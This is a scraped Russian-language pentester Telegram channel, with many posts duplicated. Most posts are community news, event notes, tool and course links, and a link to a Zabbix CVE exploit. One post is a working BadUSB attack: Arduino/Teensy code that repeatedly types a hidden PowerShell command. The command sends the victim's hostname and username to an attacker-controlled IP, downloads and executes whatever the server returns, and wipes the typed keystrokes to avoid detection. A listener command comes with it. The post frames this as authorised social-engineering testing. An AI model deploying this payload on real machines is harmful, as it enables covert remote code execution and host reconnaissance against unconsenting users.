Forwarded from Ivan Bulavin
Друзья, сообщество Standoff.
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
BadUSB Check-Script 😈
Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.
Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании😐 , нам нужно собрать минимальную информацию о хосте, с которого был отправлен запрос. В скрипте ниже, используя переменные окружения, мы отправляем с виндовой тачки запрос, содержащий hostname и username.
Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.
Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:
А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:
Здесь мы:
1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.
По основному скрипту:
1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;
2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;
3. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
не палимся)
TRY FCK HARDER 🕺
Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.
Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании
Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.
Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:
#include <paensy.h>
void setup() {
delay(5000);
SetDelay(100);
while (true) {
delay(5000);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(KEY_SPACE);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
PressKey(KEY_BACKSPACE, 1);
delay(1800000);
}
}
void loop() {
}
А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:
sudo PYTHONUNBUFFERED=x python3 -m http.server PORT &> ../http.server.log & echo $! > ../http.server.pid
Здесь мы:
1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.
По основному скрипту:
1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;
2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;
3. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
FCK HARDER
Teensy 2.0 Bad USB 😱
https://teletype.in/@e1tex/teensybadusb
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
Я продемонстрирую шаги по созданию и программированию этого маленького,…
https://teletype.in/@e1tex/teensybadusb
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
Я продемонстрирую шаги по созданию и программированию этого маленького,…
👍11🔥8❤2
ПРОНИКАЕМ НА ЗАЩИЩАЕМЫЙ ОБЪЕКТ
Всем Q, недавно совместно с @pro_pentest замутили небольшое интервью по прошедшему сольному проекту по физике:
Ссылка!
В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.
Интересных проектов много, так что рассказать точно будет о чем😈
TRY FCK HARDER 🎉
Всем Q, недавно совместно с @pro_pentest замутили небольшое интервью по прошедшему сольному проекту по физике:
Ссылка!
В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.
Интересных проектов много, так что рассказать точно будет о чем
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
FCK HARDER
TG: https://news.1rj.ru/str/e1tex
CHAT: https://news.1rj.ru/str/cht_harder
Dirty talks about pentest, python and hardware stuff/
FCK HARDER
CHAT: https://news.1rj.ru/str/cht_harder
Dirty talks about pentest, python and hardware stuff/
FCK HARDER
🔥14👍6❤3 2
Стань инсайдером на OFFZONE 2024 💪
Всем привет, приближается оффзон, а это значит, что самое время начинать к нему готовиться!
Вместе с парнями с каналов @pro_pentest и @api_0 мы предлагаем Вам почувствовать себя в шкуре инсайдера, а так же побороться за крутые призы!
С деталями челленджа знакомьтесь в видосе:
https://youtu.be/WE-GAswXMUA
Увидимся на оффзоне!
TRY FCK HARDER 💪
Всем привет, приближается оффзон, а это значит, что самое время начинать к нему готовиться!
Вместе с парнями с каналов @pro_pentest и @api_0 мы предлагаем Вам почувствовать себя в шкуре инсайдера, а так же побороться за крутые призы!
С деталями челленджа знакомьтесь в видосе:
https://youtu.be/WE-GAswXMUA
Увидимся на оффзоне!
Please open Telegram to view this post
VIEW IN TELEGRAM
Все еще достоин.. 😮
Всем ку, давно не слышались!
В последнее время у меня были (и в ближайшее время будут🤩 ) очень загруженные дни, которые не оставляли шанса запостить что-нибудь годное в канал. Основная проблема, в общем-то, и заключается в том, что сделать хочется качественно, но 24 часа в сутках, увы, не позволяют разорваться и преуспеть везде.
Это ни в коем случае не пост-оправдание, почему одмен проебывается и дропает так мало постов, скорее я просто хочу немного похвастаться и поделиться с вами своими успехами)
И такс, поехали, чем же занимался одмен все это время:
1. Вернулся к преподаванию
Удалось даже остаться в той стезе, в которой у меня уже был опыт - Python в Пентесте🤓
*Уже даже есть фидбэк<3, спасибо любимым студентам, некоторые из которых подписаны и сейчас это читают*
2. Сдал BSCP😮
Пасиба гайдам от товарища по цеху и хорошего друга Никиты - @wr3dmast3rvs. Абсолютно точно не я первый это скажу, но, по моим наблюдениям, гига важно на каждый потенциально уязвимый эндпоинт использовать Active Scan, а так же не забывать сразу ставить логинку на брут(вордлисты брал тут).
Уже после экзамена несколько раз ловил себя на мысли о том, как можно было бы без скана найти те или иные векторы, а в частности контексты внедрения.. Скорее всего, учитывая ограничения по времени, это близко, если и не к невозможному, то абсолютно точно к полной жопе, которую можно избежать, просто направляя запросы в Active Scan!
3. Сходил на Pentest Award😎
Подавал свой кейс с использованием технологий DeepFaceLive во время социалки, который позволил мне попасть в шорт-листы и оставаться конкурентным участником в своей номинации(Ловись рыбка).
Не буду рассказывать про свой фидбэк, потому что не я сижу в жюри, но с некоторыми призовыми кейсами я был немного несогласен, думаю, кто смотрел, тот поймет.
В любом случае, спасибо ребятам за то, что позвали, а я в свою очередь пойду набирать багаж опыта, чтобы было чем поделиться на премии в следующем году)
А на этом пока все, годнота близко, и думаю, что скоро смогу запостить кое-что интересное по хардваре! still fck harder!
TRY FCK HARDER 🥳
Всем ку, давно не слышались!
В последнее время у меня были (и в ближайшее время будут
Это ни в коем случае не пост-оправдание, почему одмен проебывается и дропает так мало постов, скорее я просто хочу немного похвастаться и поделиться с вами своими успехами)
И такс, поехали, чем же занимался одмен все это время:
1. Вернулся к преподаванию
Удалось даже остаться в той стезе, в которой у меня уже был опыт - Python в Пентесте
2. Сдал BSCP
Пасиба гайдам от товарища по цеху и хорошего друга Никиты - @wr3dmast3rvs. Абсолютно точно не я первый это скажу, но, по моим наблюдениям, гига важно на каждый потенциально уязвимый эндпоинт использовать Active Scan, а так же не забывать сразу ставить логинку на брут(вордлисты брал тут).
Уже после экзамена несколько раз ловил себя на мысли о том, как можно было бы без скана найти те или иные векторы, а в частности контексты внедрения.. Скорее всего, учитывая ограничения по времени, это близко, если и не к невозможному, то абсолютно точно к полной жопе, которую можно избежать, просто направляя запросы в Active Scan!
3. Сходил на Pentest Award
Подавал свой кейс с использованием технологий DeepFaceLive во время социалки, который позволил мне попасть в шорт-листы и оставаться конкурентным участником в своей номинации(Ловись рыбка).
Не буду рассказывать про свой фидбэк, потому что не я сижу в жюри, но с некоторыми призовыми кейсами я был немного несогласен, думаю, кто смотрел, тот поймет.
В любом случае, спасибо ребятам за то, что позвали, а я в свою очередь пойду набирать багаж опыта, чтобы было чем поделиться на премии в следующем году)
А на этом пока все, годнота близко, и думаю, что скоро смогу запостить кое-что интересное по хардваре! still fck harder!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤23🔥11😁1
Двигаем от второго выхода автозаводской 👊 Карточки все еще есть..
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5 3
Forwarded from PRO:PENTEST
Ребята, всем спасибо за участие в нашем конкурсе🔥
Мы определили 3 победителей, которые завтра заберут у нас свои призы🔥 🔥 🔥
🚀 1 место @scan87
🚀 2 место @Casuaq
🚀 3 место @mr4nd3r5on
Все участники поразили нас скоростью и профессионализмом. Благодарим всех! В следующий раз сделаем конкурс посложнее. Нам подсветили наши недочеты, а мы заметили как легко и играючи вы со всем справились☠️
Всем еще раз спасибо за участие! 🔥🔥🔥
Мы определили 3 победителей, которые завтра заберут у нас свои призы
Все участники поразили нас скоростью и профессионализмом. Благодарим всех! В следующий раз сделаем конкурс посложнее. Нам подсветили наши недочеты, а мы заметили как легко и играючи вы со всем справились
Всем еще раз спасибо за участие! 🔥🔥🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2👍2 2 2
Разведка/кибер-диверсии/16 часов в розыске/угон авто на проектах по физическому пентесту
Под прошлым роликом по физическому проникновению было много комментариев о том, что хотелось бы более основательно углубиться в эту тему.
Комменты читаем, прислушиваемся, решили нашей скромной командой записать подкаст, в котором поговорили буквально обо всем)
пысы. Название говорит само за себя.. 🤡
https://www.youtube.com/watch?v=s9B9zxnMSzA
Смотрим, подписываемся, лайкаем и оставляем комментарии!
TRY FCK HARDER 🤩
Под прошлым роликом по физическому проникновению было много комментариев о том, что хотелось бы более основательно углубиться в эту тему.
Комменты читаем, прислушиваемся, решили нашей скромной командой записать подкаст, в котором поговорили буквально обо всем)
https://www.youtube.com/watch?v=s9B9zxnMSzA
Смотрим, подписываемся, лайкаем и оставляем комментарии!
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Как хакеры проникают на защищаемые объекты? Часть 2
TG: https://news.1rj.ru/str/pro_pentest
Всем Привет! Этот подкаст вам зайдет!
Приходите в гости:
Канал Ивана: https://news.1rj.ru/str/fck_harder
Дисклеймер
Это обучающее видео создано исключительно в образовательных целях.
Ответственность:
Автор видео не несет ответственности…
Всем Привет! Этот подкаст вам зайдет!
Приходите в гости:
Канал Ивана: https://news.1rj.ru/str/fck_harder
Дисклеймер
Это обучающее видео создано исключительно в образовательных целях.
Ответственность:
Автор видео не несет ответственности…
🔥12❤6 5👍1
gophishGroupsAdder 😩
Всем ку! Давно не виделись!
Думаю, очевидно, что 4 квартал никого не щадит)
Исходя из задачек и того материала, над которым в данный момент работаю, решил написать следующий простенький скриптец:
https://github.com/E1tex/gophishGroupsAdder
Мало кто любитбдсм вишинг, но нужен этот скрипт по большому счету только для этого.
В случаях, когда заказчик пуляет в вас миллион клиентов, которых надо будет отзвонить, а соответственно и таргетированно отослать письма, ручками заносить всех пользаков в разные группы было бы слишком долго. Тут вам и поможет gophishGroupsAdder, работающий на основе Gophish API. Enjoy!
TRY FCK HARDER ☺️
Всем ку! Давно не виделись!
Думаю, очевидно, что 4 квартал никого не щадит)
Исходя из задачек и того материала, над которым в данный момент работаю, решил написать следующий простенький скриптец:
https://github.com/E1tex/gophishGroupsAdder
Мало кто любит
В случаях, когда заказчик пуляет в вас миллион клиентов, которых надо будет отзвонить, а соответственно и таргетированно отослать письма, ручками заносить всех пользаков в разные группы было бы слишком долго. Тут вам и поможет gophishGroupsAdder, работающий на основе Gophish API. Enjoy!
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - E1tex/gophishGroupsAdder
Contribute to E1tex/gophishGroupsAdder development by creating an account on GitHub.
🔥9 6 3❤2🤯1
Сети и системы передачи информации
Пожалуй, это один из лучших курсов, которые я когда-либо видел по практическим сетям. Сколько бы раз я ни рассказывал про него, всегда все просили поделиться ссылкой. И вот оно случилось: @sadykovildar дал добро(за что ему большое спасибо) , а значит, ловите🎸
https://sadykov.notion.site/1-bb9630269fa14ce4b21f5b10339af168
Т.к. репа в ноушене, для просмотра лекционного материала, используйте VPN.
TRY FCK HARDER 👀
Пожалуй, это один из лучших курсов, которые я когда-либо видел по практическим сетям. Сколько бы раз я ни рассказывал про него, всегда все просили поделиться ссылкой. И вот оно случилось: @sadykovildar дал добро
https://sadykov.notion.site/1-bb9630269fa14ce4b21f5b10339af168
Т.к. репа в ноушене, для просмотра лекционного материала, используйте VPN.
Please open Telegram to view this post
VIEW IN TELEGRAM
sadykov on Notion
Сети и системы передачи информации (1 семестр сетей) | Notion
Альтернативные названия дисциплины:
🔥16👍8❤2
CVE-2024-42327 😌
Немного опоздал, но, учитывая то, как забикс заполонил корпоративные сети и оценку уязвимости в 9.9 баллов по шкале CVSS, пок не утратил свою актуальность:
https://github.com/depers-rus/CVE-2024-42327
Для эксплуатации нужна валидная учетка с любой ролью, учетки которой могут взаимодействовать с апишкой.
Пок написан под постгрю, для других субд адаптируйте синтаксис запроса.
TRY FCK HARDER 😇
Немного опоздал, но, учитывая то, как забикс заполонил корпоративные сети и оценку уязвимости в 9.9 баллов по шкале CVSS, пок не утратил свою актуальность:
https://github.com/depers-rus/CVE-2024-42327
Для эксплуатации нужна валидная учетка с любой ролью, учетки которой могут взаимодействовать с апишкой.
Пок написан под постгрю, для других субд адаптируйте синтаксис запроса.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - depers-rus/CVE-2024-42327
Contribute to depers-rus/CVE-2024-42327 development by creating an account on GitHub.
🔥10👍5 4❤3